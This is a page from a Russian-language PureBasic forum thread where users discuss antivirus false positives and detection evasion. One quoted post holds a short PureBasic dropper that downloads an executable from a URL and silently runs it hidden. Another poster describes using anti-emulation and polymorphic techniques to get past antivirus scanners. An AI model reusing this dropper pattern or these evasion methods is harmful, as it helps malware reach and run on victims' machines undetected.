purebasic.info

PureBasic forum
Текущее время: Вт янв 16, 2018 6:23 pm

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ Сообщений: 43 ]  На страницу Пред.  1, 2, 3
Автор Сообщение
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Чт апр 23, 2015 9:54 am 
Не в сети
профессор

Зарегистрирован: Вс июн 10, 2012 8:18 am
Сообщений: 1294
Благодарил (а): 60 раз.
Поблагодарили: 49 раз.
Пункты репутации: 14
MrF писал(а):
Код:
1
2
3
4
file.s = "c:\logo.exe"
url.s = "http://purebasic.info/zzz.exe"
URLDownloadToFile_(0, url, file, 0, 0)
ShellExecute_(0, "open", file, "", "", #SW_HIDE)



Поигрался с обходом АВ:
https://www.virustotal.com/ru/file/28fe ... 429770733/
Тут использовал только антиэмуль, и судя по этому палят все же больше по сигнатуре.

https://www.virustotal.com/ru/file/fc54 ... 429763006/
Тут только полиморф, эмули его раскручивают и детектят гораздо больше АВ.

https://www.virustotal.com/ru/file/053a ... 429771311/
А тут антиэмуль и полиморф. Из нормальных только McAfee среагировал.
Только не понятно почему всеми любимый аваст курит в сторонке.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Пт окт 02, 2015 8:47 pm 
Не в сети
профессор

Зарегистрирован: Пт фев 20, 2009 12:57 pm
Сообщений: 1576
Откуда: Алматы
Благодарил (а): 12 раз.
Поблагодарили: 39 раз.
Пункты репутации: 5
а я дотуркал почти все службы саппорта :) и теперь всего 3 галимых антивируса срабатывают. а было 18!

правда скоро нужно будет делать обновление... опять походу всем антивирусным конторам письма щасья слать придется :)))


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Пт окт 02, 2015 9:31 pm 
Не в сети
профессор

Зарегистрирован: Пт фев 20, 2009 12:57 pm
Сообщений: 1576
Откуда: Алматы
Благодарил (а): 12 раз.
Поблагодарили: 39 раз.
Пункты репутации: 5
хы... добавил ту "обертку" из рекомендаций для RunProgramm, сделал тестовое обновление - вирус тотал и 0 срабатываний :) вот те раз!

теперь надо другие рекомендации для анинсталятора сделать. он у меня помница без окна стартует. надо значит ему окно запилить, чтоб его тоже не детектило понапрасну. рекомендации те просто супер! :)))) конечно ожидал что будет меньше срабатываний - но чтоб вообще 0 это я прям в восторге! через пару недель надо будет еще прогнать... мож там просто у кого из антивирусов позднее зажигание :)


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Сб окт 03, 2015 1:07 am 
Не в сети
профессор

Зарегистрирован: Вс июн 10, 2012 8:18 am
Сообщений: 1294
Благодарил (а): 60 раз.
Поблагодарили: 49 раз.
Пункты репутации: 14
SereZa писал(а):
а я дотуркал почти все службы саппорта

Ну да https://www.virustotal.com/en/file/e23e ... 443823495/
А код всего
Код:
1
MessageBox_(0, "", "", 0)



Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Сб окт 03, 2015 6:37 am 
Не в сети
профессор

Зарегистрирован: Чт сен 22, 2011 6:21 pm
Сообщений: 216
Благодарил (а): 30 раз.
Поблагодарили: 21 раз.
Пункты репутации: 0
MrF ваш код похож на нормальную программу? (риторический вопрос)
А что тогда удивляет в реакции антивирусов?
Они разделились на тех кто поумнее, и в курсе, что есть в природе глупый неработающий код, и тех кто не в курсе. :lol:


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Сб окт 03, 2015 7:49 am 
Не в сети
профессор

Зарегистрирован: Вс июн 10, 2012 8:18 am
Сообщений: 1294
Благодарил (а): 60 раз.
Поблагодарили: 49 раз.
Пункты репутации: 14
Ну по сути это Hello World, только без текста, но и с текстом та же реакция. И меня удивляет, как можно Hello World детектить, как троян, малварь и генерик. Видимо у них очень крутые эмуляторы и проактивки :D
Но зато, реально опасную программу(пару постов выше), из нормальных АВ детектит только McAfee, да и то не правильно.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Сб окт 03, 2015 2:31 pm 
Не в сети
профессор

Зарегистрирован: Чт сен 22, 2011 6:21 pm
Сообщений: 216
Благодарил (а): 30 раз.
Поблагодарили: 21 раз.
Пункты репутации: 0
Есть уже довольно старый способ общения между зловредными модулями, глобально хукается какая-нить безобидная апи,
а сообщения передаются как невалидные параметры этой апи (а валидные идут на стандартный обработчик).
Это не оно разве?
Код:
1
MessageBox_(0, "", "", 0)


нэ? савсэм не похоже? :wink:

зы. а если вы в вашей "реальноопасной" программе измените адрес файла (которого реально нет), на немного более реальный,
картина кардинально изменится. 8)


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Сб окт 03, 2015 3:58 pm 
Не в сети
док
Аватар пользователя

Зарегистрирован: Пн май 05, 2014 5:50 pm
Сообщений: 84
Откуда: Украина, Запорожье
Благодарил (а): 29 раз.
Поблагодарили: 5 раз.
Пункты репутации: 9
Самое парадоксальное в данной ситуации, что программа, с привилегиями дебагера, открывающая процесс с уровнем PROCESS_ALL_ACCESS, активно шустрящая в памяти, меняющая значения, инжектящая код и DLL, схватила только одно пердупреждение - ByteHero Virus.Win32.Heur.l

Ах да - написанная эмм, не самым толковым программистом)))

Единственное отличие - написана на си. А тут простенький месседж-бокс и такая реакция)))


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Сб окт 03, 2015 5:50 pm 
Не в сети
профессор

Зарегистрирован: Чт сен 22, 2011 6:21 pm
Сообщений: 216
Благодарил (а): 30 раз.
Поблагодарили: 21 раз.
Пункты репутации: 0
Meoww писал(а):
... А тут простенький месседж-бокс и такая реакция)))

Мне одному такая реакция не кажется парадоксальной? :?
я даже предположил объяснение данного поведения авиров.
Meoww писал(а):
Самое парадоксальное в данной ситуации, что программа, с привилегиями дебагера, открывающая процесс с уровнем PROCESS_ALL_ACCESS, активно шустрящая в памяти, меняющая значения, инжектящая код и DLL, схватила только одно пердупреждение - ByteHero Virus.Win32.Heur.l

а вот в этом как раз нет ничего странного, должны же как-то жить всякие отладчики, просто эта программа "правильно" (с точки зрения авиров) построена.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Сб окт 03, 2015 6:32 pm 
Не в сети
PureBasic Coder
Аватар пользователя

Зарегистрирован: Чт ноя 10, 2011 10:50 am
Сообщений: 4049
Откуда: Ростов-на-Дону
Благодарил (а): 70 раз.
Поблагодарили: 80 раз.
Пункты репутации: 24
Ну так параметры то валидные. А по логике можно любой messagebox принимать как потенциальную угрозу

_________________
Пурик - лучший язык программирования


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Сб окт 03, 2015 7:17 pm 
Не в сети
профессор

Зарегистрирован: Чт сен 22, 2011 6:21 pm
Сообщений: 216
Благодарил (а): 30 раз.
Поблагодарили: 21 раз.
Пункты репутации: 0
Никита Однороб писал(а):
Ну так параметры то валидные...

По форме - да, а по содержанию? Вы в реальной жизни такой мес-бокс видели хоть раз?
Если-бы вам попалась программа с таким вызовом (MessageBox_(0, "", "", 0)), что бы вы подумали про автора?
Должны-ли антивирусы адекватно отслеживать ситуацию "программист просто прикололся"?

зы. неконструктивный разговор получается, скатываемся на холивар, предлагаю на сем и закруглиться :?


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Сб окт 03, 2015 8:08 pm 
Не в сети
профессор

Зарегистрирован: Вс июн 10, 2012 8:18 am
Сообщений: 1294
Благодарил (а): 60 раз.
Поблагодарили: 49 раз.
Пункты репутации: 14
Kuzmat писал(а):
Есть уже довольно старый способ общения между зловредными модулями, глобально хукается какая-нить безобидная апи,
а сообщения передаются как невалидные параметры этой апи (а валидные идут на стандартный обработчик).
Это не оно разве?

Т.е. в место того, чтобы детектить механизм хуканья, они детектят по обычной апи? Это уже антивирус Бабушкина какой-то :)

Kuzmat писал(а):
измените адрес файла (которого реально нет), на немного более реальный, картина кардинально изменится

Сейчас нет этого файла по этому адресу, завтра может появится. Строить детект на отсутствии файла в сети, к которому обращается программа, я бы сказал, не совсем корректно. И не думаю, что большинство аверов на столько глупы. К тому же, если не использовать механизмы обхода ав, то детектов будет много, даже с неправильным адресом. Отсюда можно сделать вывод, что ав не раскручивает антиэмуль, иначе сдетектили бы по сигнатуре. Еще один плюс, который ав мог бы добавить к детекту - в бинаре отсутствуют вызовы опасных апи(не импорт, а именно вызов), а в сэмуленной программе они есть(т.е. когда уже прошел декрипт), т.е. явна попытка скрыть эти вызовы. Причем это был бы очень жирный плюс, если бы раскрутили.

Kuzmat писал(а):
Вы в реальной жизни такой мес-бокс видели хоть раз?

Я, например, часто тестирую куски кода в отдельном проекте. У меня такие ав давно бы с ума сошли :D


Вернуться наверх
 Профиль  
 
 Заголовок сообщения: Re: MeowwFish
СообщениеДобавлено: Пн окт 05, 2015 10:21 am 
Не в сети
профессор

Зарегистрирован: Вс июн 10, 2012 8:18 am
Сообщений: 1294
Благодарил (а): 60 раз.
Поблагодарили: 49 раз.
Пункты репутации: 14
С динамическим импортом MessageBox вообще не один не среагировал https://www.virustotal.com/en/file/fa1d ... 444029501/


Вернуться наверх
 Профиль  
 
Показать сообщения за:  Сортировать по:  
Начать новую тему Ответить на тему  [ Сообщений: 43 ]  На страницу Пред.  1, 2, 3

Часовой пояс: UTC + 3 часа


Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
cron
Создано на основе phpBB® Forum Software © phpBB Group (блог о phpBB)
Сборка создана CMSart Studio
Русская поддержка phpBB